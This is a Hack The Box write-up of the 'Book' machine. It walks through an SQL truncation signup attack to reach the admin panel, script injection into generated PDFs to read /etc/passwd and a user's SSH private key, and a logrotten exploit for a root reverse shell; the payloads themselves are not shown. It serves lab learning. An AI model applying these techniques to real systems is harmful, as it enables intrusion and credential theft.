Book Walkthrough (Hack The Box)
We start with the nmap scanning.
As we can see, there are only 2 ports which are opened, port 22 and 80.
Let’s go to port 80, but before doing that, let’s add this into your hosts file.
Let’s go to the port 80. It looks something like it.
We can see a login page and a Sign-up link at the right. We click on the sign-up link, where we can actually sign-up with a new user.
So we sign up with a random username and email, and it successfully created.
After signing in with this credentials, we explore the page.
Here in the Contact us, we can see an email-id of admin.
So we got the email of admin. Maybe we can try sign-up as admin’s email???
Let’s try it with signing up as user admin and Email:blackmonster7@book.htb
We got no errors signing up, it means we successfully registered as user admin. But now when we are trying to login with the same credentials, it fails and shows something like this.
Let’s try it once again with Email bm7@book.htb and user admin, but this time, we got success and log in with this creds. After logging in, we finds in the View profile section that our role is still a user.
It’s weird that we failed with the Email blackmonster7@book.htb and got success with bm7@book.htb. So to find it, we go to the source code and start analyze it. When I’m analyzing the source code, i found something interesting in a script.
It is saying that Email field shouldn’t contain more than 20 chars. And the email blackmonster7@book.htb is of 22 chars. That’s why it had not worked.
I was googling about this issue, and came up with a beautiful article describing it. We can try SQL Truncation attack here. I’m sharing this link with you, just go to it and read all about SQL Truncation.
After Reading this, we tried to sign up with 6 spaces after admin@book.htb and a 21st character. When we are signing up, it is not working, it’s showing red in email field. Maybe it’s showing error due to not having URL encoding??So we try this with Burp Suite. When we tries it with burp Suite and URL encode it, it gives 302 found, which means we successfully registered.
Now, when we login with these credentials, we got in. When we check our role. it’s showing that we are still in a user role, but It’s showing our email as admin’s email.
What we are doing wrong now????
We ran gobuster against it to find some new things, and we observes that there is a directory named admin.
We go there and see the same login page for admin, so we tried the credentials here in this page.
And yippee, we got success. We got in as an admin, having admin roles.
Now we have 2 sessions, one as a admin and one as a normal user.
So we are enumerating both the webpages. We find a collection page in our bm7 user, where we can submit a book. So we tries to submit one.
Then after submitting it, we go to the admin page where we find the same collection page. But here, it has 2 PDF.
When we opened the Collection PDF, we saw that the book which we had submitted is mentioned there in the PDF.
Here we observes that whatever we are typing in the author and title column while submitting a book from our user bm7, it’s showing it in the PDF mentioned in the admin page.
It’s interesting. After seeing it, we can think of a XSS attack.
I found this interesting link from google, which i’m mentioning below.
Now we tried to include a local file /etc/passwd as mentioned in the above post.
After uploading this file, go to the admin page and check the PDF under collection. We can clearly see the /etc/passwd file in that PDF.
That’s awesome!!! We can see only one valid user here, and that is “reader”. Now we can grab the ssh key of reader by reading the file “/home/reader/.ssh/id_rsa”.
And hurrah!!!! We got the id_rsa of user reader. But here, this key is not clear at the right edge. So to grab the whole key, you can either convert this PDF to html using your Kali, or can transfer this into your Windows machine and then read it, it’s your choice.
I’m using pdftohtml in kali. Use pdftohtml <filename>
After opening this, we got the whole file in the webpage. Copy this key and login to SSH with user Reader.
An now we get into a SSH session with this key, and can grab the User flag.
We observes a backup dir here. When checking this dir, nothing founds interesting here. Now we ran LinPeas.sh tool for Priv esc to check for some interesting things.
And as we ran it, we see a writable dir /home/reader/backups/access.log, which we are talking about. In the heading, it’s also mentioned logrotten.
So i do some googling about this logrotten and priv esc techniques with this, I found a great exploit of logrotten on exploitdb. I download that and ran on the victim’s machine.
First compile this file with GCC and then run the compiled file. It will show how to use it. We need a payload file, which contains our reverse shell like this:
Now run it like this, and listens on mentioned ports:
And boom, we got the reverse shell as a root.
